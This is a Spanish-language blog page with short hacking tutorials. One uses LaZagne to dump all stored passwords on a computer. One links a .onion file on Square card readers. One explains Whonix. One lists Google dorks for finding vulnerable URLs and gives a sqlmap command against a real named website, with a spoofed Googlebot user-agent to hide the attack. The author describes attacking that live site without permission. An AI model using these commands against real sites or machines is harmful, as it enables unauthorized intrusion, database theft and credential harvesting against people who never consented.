Entradas

Mostrando entradas de octubre 3, 2017
Imagen
Descarga: https://github.com/AlessandroZ/LaZagne/r...indows.zip Una vez descomprimido, abrimos la consola y nos vamos a la ruta donde se encuentra el binario. He ingresamos el comando Código: LaZagne.exe -h Para conseguir todas las contraseñas almacenadas en el ordenador solo escribimos el comando: Código: LaZagne.exe all Y si tienes suerte, te lanzara un listado de las contraseñas encontradas. Sitios del proyecto Oficial: github.com https://github.com/AlessandroZ/LaZagne
Imagen
El Lector Square permitir aceptar pagos en un teléfono inteligente o tableta, se conecta a un conector para auriculares estándar de 3.5 mm o a un puerto Lightning con el adaptador Lightning. Download: http://filesto37i2x5dea.onion/uploads/09...Square.pdf
Imagen
Máquina Virtual: En  informática  una  máquina virtual  es un  software  que simula a una computadora y puede ejecutar programas como si fuese una computadora real. Este software en un principio fue definido como "un duplicado eficiente y aislado de una máquina física". La acepción del término actualmente incluye a máquinas virtuales que no tienen ninguna equivalencia directa con ningún hardware real. Fuente: https://es.wikipedia.org/wiki/M%C3%A1quina_virtual Whonix: Es una distribución basada en Debian GNU/Linux  enfocada a la seguridad. Busca proporcionar  intimidad ,  seguridad  y  anonimato  en el internet. El sistema operativo consta de dos  máquinas virtuales , un "Workstation"o estación de trabajo y un "Gateway" o pasarela a la red  Tor  , corriendo Debian GNU/Linux. Todas las comunicaciones están forzadas a pasar bajo la red  Tor. Fuente: https://es.wikipedia.org/wiki/Whonix Bueno, al fin y al cabo ustedes todos uno
Imagen
Código: inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id= inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id= Luego de ésto, vamos ahora sí a utilizar sqlmap, también puede ser utilizada en windows, sólo se necesita tener Python instalado, pero en mi caso utilizaré Parrot. Página oficial de sqlmap: http://sqlmap.org/ Una vez comprobado que la página es vulnerable, nos dirigimos a una consola y con el enlace de la página copiado hacemos lo siguiente: sqlmap -u http://www.icdcprague.org/index.php?id=10%27 --dbs --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html )" En mi caso estoy atacando una web de cuba bastante fácil, por lo que será rápido y sin ningún problema el ataque. -u  Con esto especificamos el url a atacar. --dbs Con esto sacamos solamente la base de datos --user-agent Nos sirve para "camuflar" el ataque, es bastante recomendable utilizarlo ya que al atacar una página